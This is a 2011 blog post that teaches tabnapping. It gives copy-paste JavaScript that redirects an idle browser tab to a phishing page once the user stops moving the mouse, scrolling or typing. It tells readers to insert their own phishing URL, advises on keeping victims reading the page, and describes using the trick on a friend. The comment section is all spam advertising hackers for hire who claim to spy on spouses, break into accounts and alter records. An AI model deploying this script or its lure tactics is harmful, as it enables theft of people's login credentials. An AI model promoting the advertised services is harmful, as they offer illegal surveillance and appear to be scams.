Sunday, July 24, 2011

Tab Napping(Phishing Attack)

Theory Behind Tabnapping(please read this to understand)
How many times you have opened several tabs and forget to go to the other tabs. Because of this ignorance of victim, hacker can actually redierect the idle tab to their phishing page. And in many cases victim doesn't bother to see the URL of the page. In simple words its just a trick to confuse the user in multiple tabs.
You may be thinking why any one will login to the page if he/she didn't request it. Well, I want to ask one question: What you will do if you have Facebook login page in front of you? its our nature.


Tabnapping is done by javascript. Its all about relation of two pages, say pageA and pageB. Consider pageA is the page which is being opened in a tab and pageB is our phishing page. Now by some mechanism the pageA must be redirect to pageB(phishing page), so how to do it?

The first thing we can do is we can use setInterval() function of javascript
Example:-timerRedirect=setInterval("location.href='http://www.gmail.com'",10000); specify this in the script section this will not effect the code, its work is to redirect the page to gmail.com after 10 seconds.
But you need to redirect the page only if the page is idle so how to do it? Don't worry i have the code for that, just copy and paste the below code in your page's(pageA as per the example) "head" section.Note:-replace gmail.com with your phishing page URL. Learn how to create phishing page: Click Here.


Javascript(copy it in head section)
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
  if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
    xScroll = document.body.scrollLeft;
    yScroll = document.body.scrollTop;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
   
  }
  else if (typeof window.pageYOffset != "undefined"){
    xScroll = window.pageXOffset;
    yScroll = window.pageYOffset;
    clearInterval(timerPoll); //stop polling scroll move
    clearInterval(timerRedirect); //stop timed redirect
    timerPoll = setInterval("pollActivity()",1); //poll scrolling
    timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
   
  }
  //else do nothing
}
function pollActivity(){
  if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
   ||
   (typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
      initRedirect(); //reset polling scroll position
  }
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>


Upload your page with javascript in a website. Now the only thing you have to do is give him your page(pageA). Now a little tip: Don't let him close your page, keep some interesting article or bunch of funny pictures or anything interesting just don't let him close the tab make your article bit lengthy, so that victim does'nt complete in once(Again use your head).


I would rather like to share, how I applied this technique:- I shared my page(article included above javascript) link while chatting with a friend, and I just made him read my article. While he was reading I started sending msgs in the chat box, so he must come to answer me right? Now just I had to do is hang him in chat for minute or two, and my job is done..

Click Here to see the demo page.



5 comments:

  1. If you need to hire a real hacker to help spy on your partner's cell phone remotely, change your grades or boost your credit score. Contact this helpline +1 347.857.7580 or the email address expressfoundations@gmail.com

    ReplyDelete
  2. In case you need a hackers for hire? Do you need to keep an eye on your spouse by gaining access to their emails? As a parent do you want to know what your kids do on a daily basis on social networks ( This includes facebook, twitter , instagram, whatsapp, WeChat and others to make sure they’re not getting into trouble? Whatever it is, Ranging from Bank Jobs, Flipping cash, Criminal records, DMV, Taxes, Name it,i can get the job done.Am a professional hacker with 10 Years+ experience. Contact me at alexanderwilliam2019@gmail.com … Send an email and Its done. Its that easy, Daura referred you

    ReplyDelete
  3. In case you need a hackers for hire? Do you need to keep an eye on your spouse by gaining access to their emails? As a parent do you want to know what your kids do on a daily basis on social networks ( This includes facebook, twitter , instagram, whatsapp, WeChat and others to make sure they’re not getting into trouble? Whatever it is, Ranging from Bank Jobs, Flipping cash, Criminal records, DMV, Taxes, Name it,i can get the job done.Am a professional hacker with 10 Years+ experience. Contact me at alexanderwilliam2019@gmail.com … Send an email and Its done. Its that easy, Daura referred you

    ReplyDelete
  4. WHENEVER YOU NEED A HACKER .Every date is expected to end in sex but with this girl it was different I fell in love at first sight most people think love at first sight was a lie I too was one of those but I was immediately proven to be wrong and fate was good to me, we fell in love and we dated for 5yrs, she would come home late and I would neglect it even though we had just moved in together, I would call but she wouldn't pick up, I became suspicious of her activities I was afraid she was in a form of trouble then I sought a close friend for an advice, when I told my friend my suspicions he told me he had a friend who was in a similar situation and he would call him now to introduce us, his friend's phone rang twice then he picked up after introducing us his friend told me to contact his cousin who works as an intern for an agency that the federal bank consults with when they are attacked by hackers and he added that he also does a freelance hack to earn on the side he also gave his contact to me and he hung up after saying our thank you's. His cousin name was Rosa and she helped me with the hack and just as I feared my girl was cheating on me, she has been cheating all along and I was the fool that would always be there I was heartbroken knowing I was about to propose to her all thanks to Rosa I would still be lied too, if you are interested in her freelance service her contact info is: (Parachutelift at gmail dot com), she can also hack into any social media account, Spy on any call, text, track locations, gain password to any social media account including your Emails.

    ReplyDelete
  5. When you need a great hacker that's reliable and trustworthy and cost effective,in WORLDHACKERS79@GMAIL.COM you got the best hacker in town to hack into any devices of your choice.
    this is the only hacker that's reliable,tested and trusted,they'll deliver your work in 6hours and hack into any devices of your spouse without installing anything on the target's phone and with no physical contact on your spouse's phone.
    thanks for the good work from
    Worldhackers79@gmail.com

    ReplyDelete